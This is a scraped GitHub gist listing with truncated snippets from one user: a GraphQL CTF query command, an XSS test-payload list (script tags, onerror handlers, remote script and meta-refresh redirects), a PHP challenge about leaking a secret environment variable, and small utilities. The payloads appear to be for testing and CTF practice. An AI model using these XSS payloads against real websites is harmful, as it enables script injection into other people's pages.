ruby generate_gql_mysql.rb \
&& time curl -X POST -H "Content-Type: application/json" -d @query.json https://gql-ctf-2.herokuapp.com/graphql.json > response.json \
&& ruby decode.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo "printenv-ing" | |
printenv | |
echo "done" | |
echo "" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'securerandom' | |
require 'password_strength' | |
require 'benchmark' | |
def random_string(len) | |
SecureRandom.base64(len)[0...len] | |
end | |
Benchmark.bm do |x| |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<script> | |
var xsss = [ | |
'<script >alert("XSS - 1");</script >', | |
'<script type="application/javascript">alert("XSS - 2");</script >', | |
'<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >', | |
'<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />', | |
'<input type="image" src onerror="alert(\"XSS - 5\")">', | |
'<object data="a.a" onerror="alert(\"XSS - 6\")" />', | |
'<object data="a.a" onerror="alert(\"XSS - 7\")">', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<script> | |
/* | |
Add GET param "msg" e.g. "?msg=Some message" | |
*/ | |
alert(decodeURI(location.href.split('?msg=')[1])); | |
</script> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert(document.currentScript.getAttribute('msg') || document.currentScript.getAttribute('src').split('msg=')[1] || "XSS!"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/* | |
Run using: | |
SECRET="Some super secret text" php -S localhost:8000 | |
Goal: | |
Find out what the SECRET env is | |
*/ | |
if (empty($_POST['hmac']) || empty($_POST['host'])) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# install by adding: | |
# alias venv=". ~/location/venv.sh" | |
# to .bashrc | |
help_string="venv [option] [VENV_NAME] | |
VENV_NAME | |
activates VENV_NAME is it exists |
I hereby claim:
- I am cianmce on github.
- I am cianmce (https://keybase.io/cianmce) on keybase.
- I have a public key whose fingerprint is 95D8 378B 422A 8F0F 3585 749E 0CA9 E26E 2130 99FB
To claim this, I am signing this object:
NewerOlder